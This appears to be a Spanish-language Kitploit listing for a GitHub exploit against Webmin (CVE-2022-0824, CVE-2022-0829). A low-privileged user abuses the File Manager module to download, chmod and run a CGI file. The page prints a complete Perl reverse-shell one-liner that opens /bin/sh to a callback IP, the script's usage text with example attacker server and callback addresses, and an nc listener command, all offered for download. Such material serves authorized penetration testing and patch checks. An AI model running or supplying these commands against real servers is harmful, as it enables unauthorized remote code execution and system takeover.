Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WebminRCE-exploit — CVE-2022-0824, CVE-2022-0829, Exploit de privilegios de File Manger | Kitploit
Herramientas/GitHubGitHub/gokul-ramesh/webminrce-exploit
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubgokul-ramesh/webminrce-exploit

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829, Exploit de privilegios de File Manger

Ver Repositorio
2hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829 - Exploit de privilegio de File Manager

La aplicación vulnerable para probar este PoC se puede encontrar aquí como una imagen de docker.
Requisitos previos:

  • Python3
  • Módulo Requests

Descripción

Vulnerabilidad

Control de Acceso Inadecuado que lleva a Ejecución Remota de Código Los usuarios seguros (usuario sin privilegios) pueden acceder al módulo File Manager, que debería estar restringido por defecto.

Carga útil del Exploit

Utilice la vulnerabilidad de Control de Acceso Inadecuado para subir un archivo cgi al servidor webmin.

Etapa 1 (Autenticación)

Autentíquese e inicie sesión en el servidor con un usuario seguro/con pocos privilegios.

Etapa 2 (Descargar archivo al servidor)

Haga uso del módulo vulnerable File Manager (/file-manager/http_download.cgi) para descargar un script perl en el servidor.
Script Perl para obtener acceso a una shell reversa:
root@kitploit:~
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Etapa 3 (Modificar permiso)

Agregue permiso de ejecución al archivo (/file-manager/chmod.cgi)

Etapa 4 (Ejecutar Comando)

Simplemente llame al archivo subido para ejecutar el script de shell reversa presente en el mismo.

Instrucciones de uso :

root@kitploit:~
  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

Ejemplo de uso:

root@kitploit:~
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
root@kitploit:~
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

El nombre de usuario y la contraseña son para usuarios seguros (sin privilegios) Configure un listener antes de ejecutar el script para obtener la conexión de shell reversa.

root@kitploit:~
$ nc -lvp <port>

Gracias a @faisalfs10x por el exploit.

Descargar herramienta